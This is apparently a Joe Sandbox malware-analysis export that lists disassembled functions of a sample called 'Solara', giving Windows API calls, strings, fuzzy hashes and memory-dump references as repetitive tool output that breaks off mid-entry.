Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: DeallocateH_prolog3_catch
String ID: Current val: %d
API String ID: 20358830-1825967858
Opcode ID: 1a9f64600a9c3a494f50eb6a2345b2ef0b5d6e8f7e01413a535266df4dbeee31
Instruction ID: 1e12514a6543a1ba0dcdfa22f9345f94f3d605322e100a187e8953575040fc35
Opcode Fuzzy Hash: 1a9f64600a9c3a494f50eb6a2345b2ef0b5d6e8f7e01413a535266df4dbeee31
Instruction Fuzzy Hash: 9A619C7251C3A59FC320DF29E48066BFBE0AFD8724F150A2DF9E493642D635DA04CB56

Function 00C2C540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,?,00000002), ref: 00C2C554
FormatMessageA.KERNEL32(00001300,00000000,?,?,?,00000000,00000000), ref: 00C2C57B

Strings

!x-sys-default-locale, xrefs: 00C2C54F

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 3b0c0d2693032fcd2a595d6e9f902d804d8294aa2ca9d95a7f823cbcbec2d0a4
Instruction ID: a2ebf689c2865b50d49a5747fabdc6f1fe39300e72979f2b8e71e258bb3fc402
Opcode Fuzzy Hash: 3b0c0d2693032fcd2a595d6e9f902d804d8294aa2ca9d95a7f823cbcbec2d0a4
Instruction Fuzzy Hash: 02F030B5510114BFEB049B94DC4AEBF7BBCEB09794F104029F902DA450E2B1EE00E760

Function 00C99DBE Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00C8E086: GetLastError.KERNEL32(?,00000008,00C92A5C), ref: 00C8E08A
Part of subcall function 00C8E086: SetLastError.KERNEL32(00000000,00CB9148,00000024,00C7BBF2), ref: 00C8E12C

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C99E12
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C99E5C
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00C99F22

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 504872e3aa195540dfdab85c824620cfd9f07fe329614c912b2f8237e7f75900
Instruction ID: 11d6e5f06cbce06a0d21a155d5723d7f759b86b466affecde2bab28c6d26b3a5
Opcode Fuzzy Hash: 504872e3aa195540dfdab85c824620cfd9f07fe329614c912b2f8237e7f75900
Instruction Fuzzy Hash: AB6181719101179FDF28DF6CCC8ABBAB7A8EF14300F1440AAE91AC6585FB34DA51DB50

Function 00C775E0 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C776D8
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C776E2
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00C776EF

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: ae0f38fe25a7edf324b83ab74b40a7652aa762abc9c64d06b2ce148d741a10d5
Instruction ID: 2b5bcbc2d86f9bd1b711ba60037ebbda48a79d2bbc828c3d37df3bd7e86cdb63
Opcode Fuzzy Hash: ae0f38fe25a7edf324b83ab74b40a7652aa762abc9c64d06b2ce148d741a10d5
Instruction Fuzzy Hash: FE31937490122CABCB22DF64DC89BCDBBB4BF08350F5042EAE81DA7251E7749B859F44

Function 00C80980 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 018a7736f5bf659932d586d0fd93c2d6fc1b73146d77160d7e9597a71cf6b28e
Instruction ID: 2eb0be864f4306cbc0a9d88bf445ea86a771f57c07d81bca29ee202182a006e6
Opcode Fuzzy Hash: 018a7736f5bf659932d586d0fd93c2d6fc1b73146d77160d7e9597a71cf6b28e
Instruction Fuzzy Hash: 83F15271E012199FDF14DFA8C8806ADB7B1FF88318F25826EE825A7341D730AE45CB94

Function 00CDC490 Relevance: 3.1, Strings: 2, Instructions: 602COMMON

Download Yara Rule

Strings

KJML, xrefs: 00CDC65D
KJML, xrefs: 00CDC5D2, 00CDC5F0, 00CDC602

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: KJML$KJML
API String ID: 0-1613884386
Opcode ID: da71bab18bfdc1d5848e78e67c0f110b28e16f63857a33ae44725a72e7db1946
Instruction ID: 86a9d71bce9da9debf3ffef827aabd8e69a67676da57bd7d3a64e74486487a63
Opcode Fuzzy Hash: da71bab18bfdc1d5848e78e67c0f110b28e16f63857a33ae44725a72e7db1946
Instruction Fuzzy Hash: 5022CE702083429BE734CF15C991BABB7E2FFC4704F14892EE6999B390E7319901DB92

Function 00C94EEB Relevance: 3.0, APIs: 2, Instructions: 50COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00C94EF2
OutputDebugStringW.KERNEL32(?), ref: 00C94F09

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 47ea94ce33457196bb6eefdfaecf39a22265ecd1bcde53193168788410ab5e94
Instruction ID: 0f013d5184b14d4363f06b9404fed3d3c2020b4daf44bfea4baeb3cf34eca2b3
Opcode Fuzzy Hash: 47ea94ce33457196bb6eefdfaecf39a22265ecd1bcde53193168788410ab5e94
Instruction Fuzzy Hash: B801A43110522BBBDF247AD26C8EFAF3719EF05769F140441FD3896142CA31DA12A7B5

Function 00CFA800 Relevance: 3.0, Strings: 2, Instructions: 537COMMON

Download Yara Rule

Strings

f, xrefs: 00CFA9C0
KJML, xrefs: 00CFA855

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: KJML$f
API String ID: 0-2212088427
Opcode ID: 117f848d416ce835f7be6cf8d947e1bd81193e0b27fe9d67850885649d61e046
Instruction ID: 8bb257f29bd7a09f0f3d96d45dc463cf77e4259a11a0a4043276eaf0ab47e37d
Opcode Fuzzy Hash: 117f848d416ce835f7be6cf8d947e1bd81193e0b27fe9d67850885649d61e046
Instruction Fuzzy Hash: 6C129BB06083069FC754CF28C990B3BFBE6AF85314F148A2DE6A9872A1D774D945CB53

Function 00CDCDC0 Relevance: 3.0, Strings: 2, Instructions: 513COMMON

Download Yara Rule

Strings

YZ/-, xrefs: 00CDD275
h, xrefs: 00CDCFD1

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: YZ/-$h
API String ID: 0-2460306913
Opcode ID: 539f87777a2064f58ad59723f399b423f3d7310b373407446c149eefc83fe6f3
Instruction ID: 6f7966c62f59878519e7f6adf0149ef1f146e01dff7e9f621776f6a8e702c8fc
Opcode Fuzzy Hash: 539f87777a2064f58ad59723f399b423f3d7310b373407446c149eefc83fe6f3
Instruction Fuzzy Hash: D9F10372A083419BE310DF24DD81BAFBBE5EBD1704F08882EF98997351E634D9059B93

Function 00C9B71C Relevance: 2.8, APIs: 1, Instructions: 1260COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00C9B799

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: ede43d3d31127b562d67508c9bedeb3cf273a4f9b8ff55365fd8e2cc015f08ed
Instruction ID: 994a312aa38d897bfeaa54257bebbe2c98ec3882f46fcf4087acd3228cf080eb
Opcode Fuzzy Hash: ede43d3d31127b562d67508c9bedeb3cf273a4f9b8ff55365fd8e2cc015f08ed
Instruction Fuzzy Hash: 48B23871E046299FDF65CE28DD847EAB3B5EB88305F1541EAD85EE7240E734AE818F40

Function 00CFA6B0 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

uxVd, xrefs: 00CFA7C0
KJML, xrefs: 00CFA795

Memory Dump Source

Source File: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: KJML$uxVd
API String ID: 0-3416864494
Opcode ID: dd07ef3e6b47771d57680cfc6e9aa08ffdbe9a07fa54185d1c8b6ce1be57503e
Instruction ID: 7bc8fa5c43c1cd06c9605565aa255076b186800da107b911a4bb81b00ee319d8
Opcode Fuzzy Hash: dd07ef3e6b47771d57680cfc6e9aa08ffdbe9a07fa54185d1c8b6ce1be57503e
Instruction Fuzzy Hash: 2E410FB5504208ABCB61EF14DD80E7AF7B6EB85300F14842EEA6983211D730DE51EB93

Function 00C9473C Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00C94B81,00000000,00000000,00000000), ref: 00C94A40

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 8121a66b22d6b1ca7cf13492741f7ea5ee5301b25dc16cd8930ec09975f45d91
Instruction ID: 6578691f6d3c31825a9c89011b6884145325cb091cc4620de830b35ae94035a8
Opcode Fuzzy Hash: 8121a66b22d6b1ca7cf13492741f7ea5ee5301b25dc16cd8930ec09975f45d91
Instruction Fuzzy Hash: 4FC12672900215ABDF18AFA4DC0AEBE7BB9EF54750F144066F811E7281EB319F42DB94

Function 00C930FA Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000000), ref: 00C93327

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 314f85546d9aa73037e3ceecd5617c22096f573bc73188be463caab2ac0a04ef
Instruction ID: d603f66edde1d1a012351a33300e888cd1c01f2a5719ea6a02b8ca2119d88eec
Opcode Fuzzy Hash: 314f85546d9aa73037e3ceecd5617c22096f573bc73188be463caab2ac0a04ef
Instruction Fuzzy Hash: 4AB15E31610648DFDB15CF28C48AB657BE0FF45364F258658E8AACF2A1C735EB92CB40

Function 00C4F50C Relevance: 1.7, APIs: 1, Instructions: 242COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C4F522

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 86d7e464461e56ff72eb84333f614515ad2dcaa526ea0349f69f922fdf17a687
Instruction ID: 69066d94eac832799bfd31a3b9f84bf899b4e6c1241cbf74a9627e4a1b8866b5
Opcode Fuzzy Hash: 86d7e464461e56ff72eb84333f614515ad2dcaa526ea0349f69f922fdf17a687
Instruction Fuzzy Hash: DBA18CB19016059FDB19CF68E9827ADBBF0FB48314F14822ED45AEB3A0D3359941CF55

Function 00C9546A Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a53c90b56349f7c863c5a4a4188e2113b178e261d9d4459489ccbcf7fc1a4096
Instruction ID: e813a065fe9e60415fb3b600e32a2bed5c765e881ac847e775625d9e628bd15d
Opcode Fuzzy Hash: a53c90b56349f7c863c5a4a4188e2113b178e261d9d4459489ccbcf7fc1a4096
Instruction Fuzzy Hash: 6C51D2B5804619AFDF25DF79CC89AAEBBB9EF45300F14429DF819D3201EA319E418F50

Function 00C70B15 Relevance: 1.6, Strings: 1, Instructions: 392COMMON

Download Yara Rule

Strings

0, xrefs: 00C70CB9

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 0734520f01f4a2042dda1dfba062514f5d7bdc3aec61c51035b3f997cdfd2a81
Instruction ID: ef836325f24cdd251996ab05bd1038910c0a95d51cd633832137876b25d10d4c
Opcode Fuzzy Hash: 0734520f01f4a2042dda1dfba062514f5d7bdc3aec61c51035b3f997cdfd2a81
Instruction Fuzzy Hash: FDE19B70600605CFCB35CF68C581AAEB7B1FF59318B34CA5AD4AE9B291D730AE46CB51

Function 00C706F4 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 00C70889

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 02eaa9d127aa963f56755ce57b9a6242ffeff4e164d1214c1ec33dc0b94b777b
Instruction ID: e99f29d8ccd568de5c7340e64d9abec94659966b39ac4f41214a6d80929ee341
Opcode Fuzzy Hash: 02eaa9d127aa963f56755ce57b9a6242ffeff4e164d1214c1ec33dc0b94b777b
Instruction Fuzzy Hash: 80E17970A00705CFCB28CF68C580AAAB7B1FF49314F34C659D5AE9B291D770AE86DB51

Function 00C70F45 Relevance: 1.6, Strings: 1, Instructions: 388COMMON

Download Yara Rule

Strings

0, xrefs: 00C710DA

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 89334f886e78646cd2eb62e5b3a8625924c58285474a88c2db2aac356886fdb4
Instruction ID: 73e2f7810c39d1300667381fe69f81a31f50a2d2e4e50ff112ec4fc624b3aa28
Opcode Fuzzy Hash: 89334f886e78646cd2eb62e5b3a8625924c58285474a88c2db2aac356886fdb4
Instruction Fuzzy Hash: 5CE1AC70600605CFCB24CF6DC581AAEB7F1FF49710B28C649D9AE9B291D731AE86CB51

Function 00C6F58B Relevance: 1.6, Strings: 1, Instructions: 348COMMON

Download Yara Rule

Strings

0, xrefs: 00C6F728

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707262209.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707278066.0000000000D10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707291931.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_Solara.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ebc256318d8e1b10efff45b933fdaffc2e5c8a016db5900fdf11f5fa92fd0cd4
Instruction ID: a9a492339f7db21c5ca6c014bdebdd9dc6181b71ff0ad01c0d02edc772c6dd89
Opcode Fuzzy Hash: ebc256318d8e1b10efff45b933fdaffc2e5c8a016db5900fdf11f5fa92fd0cd4
Instruction Fuzzy Hash: 7CC1BE709046468FCB39CF68E4C067EB7A1BF0A304F24466DE4A69B6A1C731EE47DB51

Function 00C6F1FD Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00C6F38B

Memory Dump Source

Source File: 00000000.00000002.1707157066.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1707143671.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707203940.0000000000CA9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707226175.0000000000CBA000.00000004.00000001.01000000.00000003.sdmpDownload File
